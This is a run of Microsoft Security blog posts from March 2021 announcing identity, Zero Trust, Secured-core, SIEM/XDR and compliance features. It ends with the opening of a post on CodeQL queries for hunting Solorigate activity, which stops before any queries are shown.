As part of our commitment to making security as seamless as possible, passwordless authentication is now generally available for organizations to deploy at scale. Your IT admins, employees, and partners can benefit from increased security and simplicity. We’ve made it easy to roll out passwordless at scale with expanded policies that define which authentication methods specific users or groups can use. New reporting capabilities allow you to see the usage and adoption of passwordless authentication methods across your organization. To help you simplify and secure remote access, we’ve also released the preview of Temporary Access Pass, a time-limited code used to set up and recover a passwordless credential.

Microsoft already has more than 200 million passwordless users across our consumer and enterprise services. We’re excited to see even more customers adopting passwordless each day. Axiata Group is the first company in Southeast Asia to eliminate passwords for their employees. They went passwordless using Windows Hello for Business and the Microsoft Authenticator app. Abid Adam, group chief risk and compliance officer at Axiata Group said, “Rather than make their lives miserable with long passwords that create risk for the organization, we turned to biometrics. Now with Windows Hello, security is baked into our ecosystem, and we have better access to information with greater barriers to bad actors. It’s a win-win for our security team, our employees, and the company.” Similarly, in Europe, Umeå municipality wanted to strengthen security and eliminate the use of passwords. With help from Onevinn and Yubico partners, they were able to roll out their first passwordless deployment in less than 10 days. Watch my interview on Microsoft Mechanics to see passwordless in action.

Going passwordless not only simplifies the user experience but also strengthens your security posture. And thanks to Azure AD Conditional Access, you no longer need to request multifactor authentication every time someone accesses an app that touches sensitive data. Instead, you can step up authentication based on what the user is trying to do within the app—for example, downloading a highly confidential document. With Azure AD Conditional Access authentication context, now in preview, you can move away from one-size-fits-all security and adopt more granular policies that protect resources with the right level of controls based on user actions or the data they are trying to access.


  • General availability of passwordless authentication.
  • Preview of Temporary Access Pass.
  • Preview of Azure AD Conditional Access authentication context.
Secure access to all apps

Most of you manage multi-cloud environments. Your developers are building apps that are distributed across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform. They need to sign in to each cloud with only one set of credentials. So that you can quickly configure single-sign-on (SSO) and user provisioning, we’re constantly expanding the Azure AD app gallery with as many pre-integrations as possible—even with our competitors.

AWS Single Sign-On app is now pre-integrated with Azure AD and available in the app gallery. This integration lets you connect Azure AD to AWS SSO, a cloud-based service that simplifies SSO access across multiple AWS accounts and resources. You can centralize management of user access to AWS, while your employees can gain access using their Azure AD credentials.

During the past year, many organizations have relied on our Azure AD App Proxy service to help employees secure remote access to on-premises apps. Usage grew more than 100 percent last year, helping organizations move away from VPN solutions. Today, we’re adding two new features to help you get the most out of App Proxy. First, native support for header-based authentication with App Proxy is now generally available. Second, traffic optimization by region for App Proxy is now in preview. This new feature lets you designate which region your App Proxy service connector group should use and select the same region as your apps. This new feature helps reduce latency and improve performance.

To protect your legacy, on-premises applications, we’re expanding the list of our secure hybrid access partnerships to include Datawiza, Perimeter 81, Silverfort, and Strata. In addition to connecting your on-premises apps, partners like Datawiza, Strata, and Silverfort can help you discover and prioritize apps and resources to migrate to Azure AD. “Silverfort is thrilled to be able to collaborate with Azure AD to enable unified secure access to legacy, on-premises apps, and resources,” said Ron Rasin, vice president of product and strategic alliances at Silverfort. “Identity has become the primary security control plane making it critical that organizations can discover, prioritize, and migrate the apps and resources to a central identity solution like Azure AD.”

Solorigate taught us that in many cases, cloud environments are more secure than on-premises. To strengthen your defenses, it’s critical to minimize your on-premises footprint and manage all your apps from the cloud. The process of discovering applications across different environments and prioritizing them for cloud modernization can be daunting, however. To make it easier, we’re announcing the general availability of Active Directory Federation Services (AD FS) activity and insights report. This report assesses all AD FS applications for compatibility with Azure AD, checks for any issues, and provides guidance on preparing individual applications for migration to Azure AD.


  • AWS Single Sign-On now available in Azure AD app gallery.
  • General availability of AD FS activity and insights report.
  • New secure hybrid access partnerships with Datawiza, Perimeter 81, Silverfort, and Strata.
  • General availability of Azure AD App Proxy support for header-based authentication apps.
  • Preview of Azure AD App Proxy support for traffic optimization by region.
Secure your customers and partners

A strong Zero Trust approach requires that we treat access requests from customers, partners, and vendors just like requests from employees: verify every request, allow users to access the data they need only when they need it, and don’t let guests overstay their welcome. With Azure AD, you can apply consistent access policies to all types of external users.

Generally available starting this month, Azure AD External Identities is a set of capabilities for securing and managing identity and access for customers and partners. Self-service sign-up user flows in Azure AD apps make it easy to create, manage, and customize onboarding experiences for external users, with little to no application code. You can integrate support for sign-in using Google and Facebook IDs and extend the flow with powerful API connectors. Using Azure AD Identity Protection, you can protect your business-to-business (B2B) and business-to-consumer (B2C) apps and users with adaptive, machine learning–driven security.

With automated guest access reviews for Microsoft Teams and Microsoft 365 groups, now generally available, Azure AD will prompt you to review and update access permissions for all guests added to new or existing Teams or groups on a regular schedule. The process of cleaning up access to sensitive resources that your guest users no longer need will become less manual—and less neglected.


  • General availability of Azure AD External Identities.
  • General availability of Azure AD access reviews for all guests in Teams and Microsoft 365 groups.
The future of identity is bright

While 2020 was a challenging year, we have much to look forward to in 2021, with innovations that will deliver more security, transparency, and privacy for users. Last Microsoft Ignite, I talked about verifiable credentials and our commitment to empowering every person to own their own identity thanks to decentralized identifiers. I’m happy to share that Azure AD verifiable credentials is entering preview in just a few weeks. Developers will get an SDK, with quick-start guides, for building apps that request and verify credentials, just like they do with usernames and passwords. I’m also excited to announce that we are partnering with some of the leading ID verification partners—Acuant, Au10tix, Idemia, Jumio, Socure, Onfido, Vu Security—to improve verifiability and secure information exchange.

Verifiable credentials let organizations confirm information about someone—like their education and professional certifications—without collecting and storing their personal data. This will revolutionize the way we grant permissions to access our information. Organizations will be able to issue digital versions of a variety of credentials such as physical badges, loyalty cards, and government-issued paper documents based on open standards. Because the digital information is verified by a known party, it’s more trustworthy, and verification will only take minutes instead of days or weeks.

Individuals get more control over what information they share with whom, and they can restrict access to that shared information at any time. They only have to verify a credential once to use it everywhere. To manage their credentials, they can use the Microsoft Authenticator app and other wallet apps that support open standards, such as the pilot application built by Keio University for their students.


  • Preview of Azure AD verifiable credentials.

And finally, I’m happy to share that we’re releasing a new Microsoft Identity and Access Administrator Certification, which you can find at the Microsoft Security Resources portal. This training helps admins design, implement, and operate Azure AD as the organization’s security control plane.


  • Release of the Microsoft Identity and Access Administrator Certification.

The new features announced at Microsoft Ignite will make it easier to provide seamless user experiences in the hybrid workplace and to strengthen your defenses against attacks that are increasingly sophisticated. As you try these new tools, please send us your feedback so we can continue to build advancements that help you keep your employees secure, connected, and productive.

Let’s make 2021 the Year of Passwordless!

To see these features in action when I take the Microsoft Ignite stage tomorrow, register for free at Microsoft Ignite and watch my session starting at 5 PM Pacific Time. Follow Microsoft Identity at @AzureAD on Twitter for more news and best practices.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security Blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Identity at Microsoft Ignite: Strengthening Zero Trust defenses in the era of hybrid work appeared first on Microsoft Security.

Microsoft brings advanced hardware security to Server and Edge with Secured-core

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

A cursory look at recent headlines reveals two clear trends. First, organizations around the world are embracing digital transformation using technologies across cloud and edge computing to better serve their customers and thrive in fast-paced environments. Second, attackers are constantly innovating new attacks as technology changes and targeting these organizations’ high-value infrastructure with advanced technical capabilities connected to both cybercrime and espionage.

The MagBo marketplace, which sells access to more than 43,000 hacked servers, exemplifies the ever-expanding cybercrime threat. Compromised servers are being exploited to mine cryptocurrency and are being hit with ransomware attacks. Meanwhile, IoT vulnerabilities are on the rise, with more than half of IoT devices deemed susceptible to attack. In addition to these risks, companies often struggle with a lack of expertise and familiarity with security standards as well as complex regulations like the IoT Cybersecurity Improvement Act of 2020.

Given these factors, continuing to raise the security bar for critical infrastructure against attackers and also make it easy for organizations to hit that higher bar is a clear priority for both customers and Microsoft. As systems like the Xbox show, successfully protecting systems requires a holistic approach that builds security from the chip to the cloud across hardware, firmware, and the operating system. Using our learnings from the Secured-core PC initiative, Microsoft is collaborating with partners to expand Secured-core to Windows Server, Azure Stack HCI, and Azure-certified IoT devices, as well as bring the Secured-core values of advanced hardware-based protection and simpler security enablement to the server and IoT ecosystem.

Powerful protection with Secured-core Server and Edge Secured-core

Following Secured-core PC, we are introducing Secured-core Server which is built on three key pillars: simplified security, advanced protection, and preventative defense. Secured-core Servers come with the assurance that manufacturing partners have built hardware and firmware that satisfy the requirements of the operating system (OS) security features. Like Secured-core PC and Secured-core Server, Edge Secured-core advances built-in security for IoT devices running a full OS. Edge Secured-core also expands Secured-core coverage to Linux, in addition to Windows platforms.

Simplified security

New functionality in the Windows Admin Center makes it easy for customers to configure the OS security features of Secured-core for Windows Server and Azure Stack HCI systems. The new Windows Admin Center security functionality will allow enabling advanced security with a click of the button from a web browser anywhere in the world. With integrated Azure Stack HCI systems, manufacturing partners can also enable OS features, further simplifying the configuration experience for customers so that Microsoft’s best server security is available right out of the box. For Windows Server and validated Azure Stack HCI solutions, customers can look for Secured-core certified systems to simplify acquiring secure hardware platforms.

The Azure Certified Device program already helps customers find the right edge and IoT solutions for their needs. We are adding the Edge Secured-core public preview to the Azure Certified Device program. Edge Secured-core devices meet extra security requirements around device identity, secure boot, OS hardening, device updates, data protection, and vulnerability disclosures, which will be uniquely identifiable on the Azure Certified Device catalog.

Advanced protection

Secured-core Servers maximize hardware, firmware, and OS capabilities to help protect against current and future threats. These safeguards create a platform with added security for critical applications and data used on the server. Secured-core functionality spans the following areas:

  • Hardware root-of-trust: Trusted Platform Module 2.0 (TPM 2.0) comes standard with Secured-core Servers, providing a protected store for sensitive keys and data, such as measurements of the components loaded during boot. Being able to verify that firmware that runs during boot is validly signed by the expected author and not tampered with helps improve supply chain security. This hardware root-of-trust elevates the protection provided by capabilities like BitLocker, which uses the TPM 2.0 and facilitates the creation of attestation-based workflows that can be incorporated into zero-trust security strategies.
  • Firmware protection: In the last few years, there has been a significant uptick in firmware vulnerabilities, in large part due to the higher level of privileges that firmware runs combined with limited visibility into firmware by traditional anti-virus solutions. Using processor support for Dynamic Root of Trust of Measurement (DRTM) technology, Secured-core systems put firmware in a hardware-based sandbox helping to limit the impact of vulnerabilities in millions of lines of highly privileged firmware code.
  • Virtualization-based security (VBS): Secured-core Servers support VBS and hypervisor-based code integrity (HVCI). The cryptocurrency mining attack mentioned earlier leveraged the EternalBlue exploit. VBS and HVCI help protect against this entire class of vulnerabilities by isolating privileged parts of the OS, like the kernel, from the rest of the system. This helps to ensure that servers remain devoted to running critical workloads and helps protect related applications and data from attack and exfiltration.

Edge Secured-core devices come with a built-in security agent, a zero-trust attestation model, and security by default, delivering on the following security features:

  • Hardware-based device identity.
  • Capable of enforcing system integrity.
  • Stays up to date and is remotely manageable.
  • Provides protection for data at rest and data in transit.
  • Built-in security agent and hardening.

Preventative defense

Secured-core Servers and Edge Secured-core have security mitigations built into the hardware and OS platform to help thwart common attack vectors. Secured-core functionality helps proactively close the door on the many paths that attackers may try to exploit, and it allows IT and SecOps teams to optimize their time across other priorities.

Coming soon, with the support of the ecosystem

Secured-core Servers across Windows Server 2022 and Azure Stack HCI will help customers stay ahead of attackers and help protect their infrastructure across hardware, firmware, and operating systems. Supported hardware will be available in future product generations from Intel, AMD, and our vibrant OEM ecosystem.

“Continuing the rich tradition of innovation in hardware security, AMD is excited to partner with Microsoft to enable Secured-core Server with its future EPYC processors”, said Akash Malhotra, AMD director, security product management. “With attacks on firmware increasing, a tight integration between AMD hardware security features and the Windows Server operating system will benefit users across the ecosystem.”

“Today’s distributed world demands a new era of security. Intel and Microsoft are working together to provide innovative levels of security controls that provide customers with unified, integrated protection,” said Jeremy Rader, General Manager, Intel Cloud and Enterprise Group. “We’re combining the power of Secured core server with our 3rd Gen Intel Xeon Scalable processors (code-named Ice Lake) that creates a chain of trust across all layers of compute, from the hardware, to the firmware to the OS. Customers get a seamless root of trust that combines the most advanced security with management ease.”

You can learn more about Secured-core Servers and Windows Server 2022 security in the related blog.

To get started with Edge Secured-core certification, browse the following resources:

To learn more about Secured-core Servers and Edge Secured-core, be sure to join us during Microsoft Ignite from March 2-4, 2021.

The post Microsoft brings advanced hardware security to Server and Edge with Secured-core appeared first on Microsoft Security.

4 ways Microsoft is delivering security for all in a Zero Trust world

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

If there’s one thing the dawning of 2021 has shown, it’s that security isn’t getting any easier. Recent high-profile breach activity has underscored the growing sophistication of today’s threat actors and the complexity of managing business risk in an increasingly connected world. It’s a struggle for organizations of every size and for the public and private sector alike. As we move into this next phase of digital transformation, with technology increasingly woven into our most basic human activities, the questions that we as security defenders must ask ourselves are these: How do we help people to have confidence in the security of their devices, their data, and their actions online? How do we protect people, so they have peace of mind and are empowered to innovate and grow their future? How do we foster trust in a Zero Trust world?

As defenders ourselves, we are passionate proponents of a Zero Trust mindset, encompassing all types of threats—both outside in and inside out. We believe the right approach is to address security, compliance, identity, and device management as an interdependent whole and to extend protection to all data, devices, identities, platforms, and clouds—whether those things are from Microsoft or not.

You may have heard us talk about our commitment to security for all, and that’s at the heart of it. We are deeply inspired to empower people everywhere to do the important work of defending their communities and their organizations in an ever-evolving threat landscape.

With that approach in mind, today I’m excited to share several additional innovations across four key areas with you—identity, security, compliance, and skilling—to give you the holistic security protection you need to meet today’s most challenging security demands.

1. Identity: The starting point of a Zero Trust approach

Adopting a Zero Trust strategy is a journey. Every single step you take will make you more secure. In today’s world, with disappearing corporate network perimeters, identity is your first line of defense. While your Zero Trust journey will be unique, if you are wondering where to start, our recommendation is to start with a strong cloud identity foundation. The most fundamental steps like strong authentication, protecting user credentials, and protecting devices are the most essential.

Today we are announcing new ways that Azure Active Directory (Azure AD), the cloud identity solution of choice for more than 425 million users, can help you on your Zero Trust journey:

  • Passwordless authentication, which eliminates one of the weakest links in security today, is now generally available for cloud and hybrid environments. Now you can create end-to-end experiences for all employees, so they no longer need passwords to sign in to the network. Instead, Azure AD now lets them sign in with biometrics or a tap using Windows Hello for Business, the Microsoft Authenticator app, or a compatible FIDO2 security key from Microsoft Intelligent Security Association partners such as Yubico, Feitian, and AuthenTrend. With Temporary Access Pass, now in preview, you can generate a time-limited code to set up or recover a passwordless credential.
  • Azure AD Conditional Access, the policy engine at the heart of our Zero Trust solution, now uses authentication context to enforce even more granular policies based on user actions within the app they are using or sensitivity of data they are trying to access. This helps you appropriately protect important information without unduly restricting access to less sensitive content.
  • Azure AD verifiable credentials is entering preview in just a few weeks. Verifiable credentials let organizations confirm information—like their education or the professional certifications someone provides—without collecting and storing their personal data, thereby improving security and privacy. In addition, new partnerships integrating Azure AD verifiable credentials with leading identity verification providers like Onfido, Socure, and others will improve verifiability and secure information exchange. Customers such as Keio University, the government of Flanders, and the National Health Service in the UK are already piloting verifiable credentials.

Learn more about our Azure AD announcements in today’s blog post by Joy Chik.

2. Security: Simplifying the “assume breach” toolset

In today’s landscape, your security approach should start with the key Zero Trust principle of assume breach. But too often, complexity and fragmentation stand in the way. It is our commitment to helping you solve this, as we build security for all, delivered from the cloud.

This begins with integrated solutions that let you focus on what matters and deliver visibility across all your platforms and all your clouds. Some vendors deliver endpoint or email protection, while others deliver Security Information and Event Management (SIEM) tools, and integrating those pieces together can be a time-consuming challenge. Microsoft takes a holistic approach that combines best-of-breed SIEM and extended detection and response (XDR) tools built from the ground up in the cloud to improve your posture, protection, and response. This gives you the best-of-breed combined with the best-of-integration so you don’t have to compromise.

Today we are making the following announcements to simplify the experience for defenders with modern and integrated capabilities:

  • Microsoft Defender for Endpoint and Defender for Office 365 customers can now investigate and remediate threats from the Microsoft 365 Defender portal. It provides unified alerts, user and investigation pages for deep, automated analysis and simple visualization, and a new Learning Hub where customers can leverage instructional resources with best practices and how-tos.
  • Incidents, schema, and user experiences are now common between Microsoft 365 Defender and Azure Sentinel. We also continue to expand connectors for Azure Sentinel and work to simplify data ingestion and automation.
  • The new Threat Analytics provides a set of reports from expert Microsoft security researchers that help you understand, prevent, and mitigate active threats, like the Solorigate attacks, directly within Microsoft 365 Defender.
  • We are bringing Secured-core to Windows Server and edge devices to help minimize risk from firmware vulnerabilities and advanced malware in IoT and hybrid cloud environments.

Learn more about our threat protection announcements in today’s blog post by Rob Lefferts and Eric Doerr. Learn more about our Secured-core announcements in today’s blog post by David Weston. You can also learn more about new security features in Microsoft Teams in today’s blog post by Jared Spataro.

Today’s announcements continue, and strengthen, our commitment to deliver best-of-breed protection, detection, and response for all clouds and all platforms with solutions like Defender for Endpoint—a leader in the Gartner Magic Quadrant, available for Android, iOS, macOS, Linux, and Windows; and Azure Sentinel—which looks across your multi-cloud environments, including AWS, Google Cloud Platform, Salesforce service cloud, VMware, and Cisco Umbrella.

3. Compliance: Protection from the inside out

At Microsoft, we think of Zero Trust as not only the practice of protecting against outside-in threats, but also protecting from the inside out. For us, addressing the area of compliance includes managing risks related to data.

And that isn’t just the data stored in the Microsoft cloud, but across the breadth of clouds and platforms you use. We’ve invested in creating that inside-out protection by extending our capabilities to third parties to help you reduce risk across your entire digital estate.

Today we are announcing these new innovations in compliance:

  • Co-authoring of documents protected with Microsoft Information Protection. This enables multiple users to work simultaneously on protected documents while taking advantage of the intelligent, unified, and extensible protection for documents and emails across Microsoft 365 apps.
  • Microsoft 365 Insider Risk Management Analytics, which can identify potential insider risk activity within an organization and help inform policy configurations. With one click, customers can have the system run a daily scan of their tenant audit logs, including historical activity, and leverage Microsoft 365’s Insider Risk Management machine learning engine to identify potential risky activity with privacy built-in by design.
  • Microsoft 365 now offers data loss prevention (DLP) for Chrome browsers and on-premises server-based environments such as file shares and SharePoint Server.
  • Azure Purview is integrated with Microsoft Information Protection, enabling you to apply the same sensitivity labels defined in Microsoft 365 Compliance Center to data residing in other clouds or on-premises. With Azure Purview, a unified data governance solution for on-premises, multi-cloud, and software as a service (SaaS) data, you can scan and classify data residing in AWS Simple Storage Services (S3), SAP ECC, SAP S4/HANA, and Oracle Database.

Learn more about our compliance announcements in today’s blog post by Alym Rayani.

4. Skilling: Power your future through security skilling

We know that many of you continue to struggle to fill the security skills gap with an estimated shortfall of 3.5 million security professionals by 2021. That’s why we strive to ensure you have the skilling and learning resources you need to keep up in our world of complex cybersecurity attacks. We are excited to announce two different ways Microsoft is supporting skilling cybersecurity professionals.

First, Microsoft has four new security, compliance, and identity certifications tailored to your roles and needs, regardless of where you are in your skilling journey. To learn more about these new certifications, please visit our resource page for Microsoft Certifications.

  • Security, Compliance, and Identity Fundamentals certification will help individuals get familiar with the fundamentals of security, compliance, and identity across cloud-based and related Microsoft services.
  • Information Protection Administrator Associate certification focuses on planning and implementing controls that meet organizational compliance needs.
  • Security Operations Analyst Associate certification helps security operational professionals design threat protection and response systems.
  • Identity and Access Administrator Associate certification help individuals design, implement and operate an organization’s identity and access management systems by using Azure Active Directory.

We also recognize that the world we live in is complex but growing your skills shouldn’t be. The Microsoft Security Technical Content Library will help you find content relevant to your needs. Use it to access content based on your own needs today.

You can also learn more on today’s Tech Community blog post.

Security for all

We at Microsoft Security are committed to helping build a safer world for all. Every day, we are inspired by the work of our defenders and we are focused on delivering innovations, expertise, and resources that tip the scale in favor of defenders everywhere because the work you do matters. Security is a team sport, and we’re all in this together.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 4 ways Microsoft is delivering security for all in a Zero Trust world appeared first on Microsoft Security.

Microsoft unifies SIEM and XDR to help stop advanced attacks

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

For all of us in security, the last twelve months have been an incredible series of challenges—from balancing remote work with family priorities, to helping build resilient businesses, and protecting against the latest attacks. 2020 showed us that while we have made great progress, there is still a lot we can do as individuals, organizations, and as a community to keep secure. Here at Microsoft, we’re committed to applying these learnings to help create a stronger, more unified approach to security for all—no matter what platform you’re on, device you’re trying to protect, or cloud your data is in.

To help protect against advanced attacks, last September at Microsoft Ignite we shared our vision to create the most complete approach to securing your digital landscape, all under a single umbrella. We combined the breadth of Azure Sentinel, our cloud-native SIEM (security information and event management) with the depth of Microsoft 365 Defender and Azure Defender, our XDR (extended detection and response) tools, to help fight against attacks that take advantage of today’s diverse, distributed, and complex environments.

Today we are taking the next step in unifying these experiences and delivering enhanced tools and intelligence to stop modern threats.

Unified experiences

Most SIEMs on the market today simply take logs from multiple sources. Azure Sentinel accepts logs across your environment with many third-party security products and can go a step further with Azure Defender and Microsoft 365 Defender. Starting today, incidents, schema, and alerts are shared between Azure Sentinel and Microsoft 365 Defender. This means you get a unified view in Azure Sentinel, then can seamlessly drill down into an incident for more context in Microsoft 365 Defender.

For example: Start in Azure Sentinel for your bird’s eye view to understand an overarching incident, then move directly into Microsoft 365 Defender to investigate an asset or a user in more detail. You can even remediate and close the incident directly within Microsoft 365 Defender, all while maintaining bi-directional syncing with Azure Sentinel. This is next level SIEM integration you won’t find anywhere else.

On the Microsoft 365 Defender side, we are working to reduce the number of portal experiences. The goal is to have a single unified XDR experience for securing end-user environments, rather than a suite of products. Today marks a significant milestone in that effort as we integrate the capabilities of Microsoft Defender for Endpoint and Defender for Office 365 together into the unified Microsoft 365 Defender portal. These changes simplify tasks that would require multiple experiences across comparable products in the market. We have also taken the opportunity to significantly enhance the email entity page with a new 360-degree view of email alerts with relevant context and email alert capabilities.

Enhanced tools and intelligence to stop advanced attacks

As well as unifying the capabilities of Microsoft Defender for Endpoint and Defender for Office 365 into Microsoft 365 Defender, we have also created new enhanced experiences including:

  • Threat Analytics, now in preview, provides detailed threat intelligence reports from expert Microsoft security researchers that help you understand, prevent, and mitigate active threats.
  • Learning Hub where you can use instructional resources with best practices and how-tos.
  • Attack Simulation Training in Microsoft Defender for Office 365 which helps you detect, prioritize, and remediate phishing risks. It uses neutralized versions of real attacks to simulate the continually changing attacker landscape, enabling highly accurate and up-to-date detection of risky behavior, with rich reporting and analytics to help customers measure their progress.

With Azure Sentinel, we’re focused on giving you a richer organization-wide view with expanded data collection and helping you to respond faster with new incident response and automation capabilities. Today we are announcing more than 30 new connectors to simplify data collection across your entire environment, including multi-cloud environments. These new connectors include Salesforce service cloud, VMWare, Cisco Umbrella, and Microsoft Dynamics.

We’re also expanding Azure Sentinel’s SOAR capabilities. Today we’re introducing automation rules (a new and simple framework for automating common tasks), and new automation connectors with additional built-in SOAR playbooks. These new playbooks enable automation workflows such as blocking a suspicious IP address with Azure Firewall, isolating endpoint devices with Microsoft Intune, or updating the risk state of a user with Azure Active Directory Identity Protection. You can learn more about these Azure Sentinel innovations on the Azure Sentinel Microsoft Ignite 2021 announcement blog.

Finally, Azure Defender now provides improved alerts features, including improved triaging experience with better performance for larger alert lists, alerts from Azure Resource Graph, sample creation feature for Azure Defender alerts, and alignment with Azure Sentinel’s incident experience. To learn more about these and other Azure Security Center announcements, please read the Azure Security Center Microsoft Ignite 2021 announcement blog.

Looking ahead

We’ve been on a long journey to figure out how to understand and help you protect against advanced attacks. We’re only just getting started on our mission and will continue to unify tools and add intelligence to help keep your environment healthy and secure.

Be sure to check out our Microsoft Ignite session, and learn more about our SIEM + XDR offering.

As always, thank you for your continued partnership on this journey.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

-Rob, Eric, and our entire Microsoft Security Team

The post Microsoft unifies SIEM and XDR to help stop advanced attacks appeared first on Microsoft Security.

Securing and governing data in a new hybrid work reality

Microsoft Malware Protection Center - Tue, 03/02/2021 - 9:00am

The past year has led to an evolution in not only how we think about work, but more importantly, where work gets done. Arguably, gone are the days that your organization’s data is limited to the protected confines of your corporate network as your people continue to work remotely, return in some capacity to the office, or even adopt some hybrid of the two. With your people working across networks, devices, clouds, and apps, how do you ensure your data remains not only secure but compliant?

A culture of security starts by securing data where people get work done. We have been investing in innovation to make this easier, and I’m sharing with you some additional capabilities that enable you to extend data protection and governance across apps, clouds, endpoints, and on-premises file repositories that keep your people collaborative and productive while ensuring your most valuable asset—your data—remains secure and compliant wherever it lives.

Co-authoring of Microsoft Information Protection-protected documents now available in preview

With the shift to remote work, people are creating, storing, and sharing data in new ways. Collaboration and productivity are critical to getting work done, but you still need to ensure that the data remains safe wherever it is. Data classification in Microsoft Information Protection protects your business-critical data so your people can collaborate securely without having to sacrifice productivity.

Today we are announcing the ability for multiple users to simultaneously edit a Microsoft Office document that has been encrypted using Microsoft Information Protection, now in preview. In the past, you had to choose between encrypting sensitive content and collaborating on it. If you encrypted the content, only one person could edit at a time. Everyone else would be locked out, and AutoSave would be disabled to preserve the encryption. With this new unique capability, multiple people can now be co-authors on a Word, Excel, or PowerPoint document simultaneously, frictionlessly, with auto-save, while maintaining the sensitivity labeling and document protections.

Learn more on Microsoft docs.

Microsoft 365 data loss prevention now available in preview for Chrome and on-premises

Enabling a comprehensive and flexible approach to data loss prevention solutions is one of the most important ways to protect your data.  We have been investing heavily in this area, and our unified Data Loss Prevention (DLP) solution—a key part of Microsoft Information Protection—understands and classifies your data, keeps it protected, and prevents data loss across Microsoft 365 Apps (including Word, PowerPoint, Excel, and Outlook), services (including Microsoft Teams, SharePoint, and Exchange), third-party software as a service (SaaS) applications, and more—on-premises or in the cloud. Microsoft’s unified data loss prevention approach provides simplicity, enabling you to set a data loss prevention (DLP) policy once and have it enforced across services, endpoints, and first-and third-party apps.

A few months ago, we announced Endpoint DLP, which provides built-in data loss prevention into Windows 10 and Microsoft Edge. Today we’re announcing that we are extending Microsoft’s unified DLP capabilities natively to Chrome browsers and on-premises file shares and SharePoint Server.

You can learn more about this preview on Tech Community.

Microsoft Azure Purview provides new multi-cloud support

In December 2020, we announced Azure Purview, a unified data governance service that facilitates the mapping and control of organizational data no matter where it resides. Azure Purview is integrated with Microsoft Information Protection, which means you can apply the same sensitivity labels defined in Microsoft 365 Compliance Center to your data in Azure.

Today we’re sharing that we are extending Azure Purview’s ability to automatically scan and classify data to other platforms, such as AWS Simple Storage Services (S3), SAP ECC, SAP S4/HANA, and Oracle Database. Available now in preview, you can now automatically scan and classify data residing within various on-premises data stores using the Azure Purview Data Map.

We are also expanding the insight available within Azure Purview. Available now in preview, Azure Purview can now scan Azure Synapse Analytics workspaces, which enables you to discover and govern data across your serverless and dedicated SQL pools. This expands on Azure Purview’s existing tools enabling customers to scan data across various sources via out-of-the-box connectors in the Data Map.

You can learn more in the Azure Purview blog.

Microsoft 365 Insider Risk Management Analytics available in preview

Another important component of securing your data as people work in new and different ways is effectively managing insider risk. Balancing the ability to quickly identify and manage insider risks while maintaining a dynamic culture of trust and collaboration is a priority for security leaders.

With privacy built-in, pseudonymization on by default, and strong role-based access controls, Insider Risk Management in Microsoft 365 is used by businesses worldwide to quickly get started using machine learning to identify insider risks and take action with integrated collaboration workflows.

Today we’re announcing Microsoft 365 Insider Risk Management Analytics, which can identify potential insider risk activity within an organization and help inform policy configurations. With one click, customers can have the system run a daily scan of their tenant audit logs, including historical activity, and leverage Microsoft 365’s Insider Risk Management Machine Learning engine to identify potential risky activity with privacy built-in by design. Insider Risk Management Analytics will start rolling out to tenants in public preview in mid-March 2021.

For more information, check out the Tech Community blog.

Continued investments to help you address compliance and risk

We’ve been hard at work across our entire portfolio to ensure you have the capabilities you need to protect and govern your data while addressing regulatory compliance and eDiscovery. Here are a few more announcements we’re making today:

  • Additional assessment templates and enhanced capabilities in Compliance Manager to increase regulation visibility, further enrich the user experience, and save you valuable time.
  • Further guidance to get started with Advanced Audit to support your forensic investigations when you suspect a data breach.

In addition, our partner ecosystem plays a critical role in helping you to address your compliance and risk management needs. I’m announcing today that we are expanding the Microsoft Intelligent Security Association (MISA) to include risk management and compliance partners to enable greater scale and customization.

We will continue to innovate and work closely alongside you, our partners, and the industry to improve compliance and security for everyone. We’re on this journey together.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Securing and governing data in a new hybrid work reality appeared first on Microsoft Security.

Microsoft open sources CodeQL queries used to hunt for Solorigate activity

Microsoft Malware Protection Center - Thu, 02/25/2021 - 11:00am

A key aspect of the Solorigate attack is the supply chain compromise that allowed the attacker to modify binaries in SolarWinds’ Orion product. These modified binaries were distributed via previously legitimate update channels and allowed the attacker to remotely perform malicious activities, such as credential theft, privilege escalation, and lateral movement, to steal sensitive information. The incident has reminded organizations to reflect not just on their readiness to respond to sophisticated attacks, but also the resilience of their own codebases.

Microsoft believes in leading with transparency and sharing intelligence with the community for the betterment of security practices and posture across the industry as a whole. In this blog, we’ll share our journey in reviewing our codebases, highlighting one specific technique: the use of CodeQL queries to analyze our source code at scale and rule out the presence of the code-level indicators of compromise (IoCs) and coding patterns associated with Solorigate. We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries we cover in this blog simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality. Both can occur coincidentally in benign code, so all findings will need review to determine if they are actionable. Additionally, there is no guarantee that the malicious actor is constrained to the same functionality or coding style in other operations, so these queries may not detect other implants that deviate significantly from the tactics seen in the Solorigate implant. These should be considered as just a part in a mosaic of techniques to audit for compromise.

Microsoft has long had integrity controls in place to verify that the final compiled binaries distributed to our servers and to our customers have not been maliciously modified at any point in the development and release cycle. For example, we verify that the source file hashes generated by the compiler match the original source files. Still, at Microsoft, we live by the “assume breach” philosophy, which tells us that regardless of how diligent and expansive our security practices are, potential adversaries can be equally as clever and resourced. As part of the Solorigate investigation, we used both automated and manual techniques to validate the integrity of our source code, build environments, and production binaries and environments.

